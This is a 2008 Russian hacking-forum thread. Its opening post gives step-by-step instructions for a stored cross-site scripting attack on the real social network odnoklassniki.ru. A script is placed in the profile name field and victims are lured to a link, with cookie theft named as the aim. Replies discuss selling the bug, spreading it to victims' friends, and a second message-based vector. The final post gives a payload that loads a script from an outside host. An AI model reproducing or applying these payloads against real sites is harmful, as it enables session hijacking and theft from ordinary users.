Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Odnoklassniki.ru (https://forum.antichat.xyz/showthread.php?t=64952)

Isis 21.03.2008 12:41

Odnoklassniki.ru
 

[Intro]
Спустя 10 минут после регистрации на odnoklassniki.ru, была найдена активная xss...
Собственно регистрация для этого и была произведена :)
Что с неё взять?
-Конечно cookies (Не печенье).
Такой баг на огромнейшей соц.сети может вызвать п.зд.ц
К чему я все...начнем...
[Vulnerability]
Авторизуемся на сайте http://odnoklassniki.ru, если нет акка, пройдите 2х минутную авторизацию.
Далее проходим на свою личную страницу -> Основное -> Редактировать личные данные ->
(*.odnoklassniki.ru/dk?st.cmd=userSelfProfileEdit)
Ваше имя - <script>alert(/1/)</script>
Сохранить.
Переходим в "Форум" (*.odnoklassniki.ru/dk?st.cmd=userForum) -> Добавить -> Уже видна активка, но это не то :)
Пишем что-нибудь в сообщении -> Добавить
Переходим в свой форум -> Клацаем по ссылке "Написать сообщение" (далее [1]) ->
Ну и вот она активная xss :)

//Везде на вашей странице где есть сылка "Написать сообщение" + кликнув по ней будет активная xss
//будь то "Друзья" , "Друзья друзей", Сообщества" ...везде
[Application]
Жертве необходимо быть авторизованным на сайте и всего перейти по вашей ссылке [1] где и будет произведен ваш js код...
Желаю удачи
[Video]
ROFL, http://www.x3k.name/odnoklassniki.ru[active.xss]-Isis.rar
[Copyright]
© by Isis 13.03.2008, xeka.ru
Greetz to: gemaglabin, blackybr, +toxa+, ettee, b00zy_c0d3r, NOFEAR, Rebz, Barsik, c411k, Elekt, ettee, .fuf, lamarez, cash, limpompo, madnet, Great, podkashey, KEZ, GreenBear, w1z, m0nzt3r, PEPSICOLA :D, Puff, Proteus and other....

xcedz 21.03.2008 12:45

А ведь не давно стоило скока то денег (ТС ты эту багу пытался продать?)... что то творится не ладное... магнитные бури?

Ну вообще м то эт даже не похоже на статью, а обзор уязвимости
на одноклассниках, мб это связано с пристальным вниманием фсб на эту "контору" поэтому начался слив ? :D

SchmeL 21.03.2008 13:11

тепрь все зависит от времени, кто быстрее...пока не прикрыли.
З.Ы допустим есть чел с 600 друзьями, друзья друзей более 3000. возможноли туда впихнуть редирект или банер рекламный какой на сайт?

КИНГ 21.03.2008 14:29

там же для воровства кук скрипт не вмещается :/

Isis 21.03.2008 21:57

КИНГ, Если перечитать статью и подумать?

Sn@k3 21.03.2008 22:11

мда )))) ты еще сайт открой и форум с платной булкой поставь, чтобы посвятить крутую хсс ))))))))))))))))))))))))))))) достаточно в знакомый до боли раздел пихнуть -)

Cawabunga 22.03.2008 00:14

хм а как по поводу сайта ? кссоднаклассники.ру :)

freddi 22.03.2008 00:41

isis , а ты не заметил еще одну?
когда человек будет писать в личку тому у кого стоит скрип вместо имени, то тоже он исполнится.

Cawabunga 22.03.2008 01:46

Цитата:

isis , а ты не заметил еще одну?
когда человек будет писать в личку тому у кого стоит скрип вместо имени, то тоже он исполнится.
ксс2однаклассники.ру ? : ))

Isis 27.03.2008 05:39

<script src=http://66.ru/x.js></script>


Время: 01:37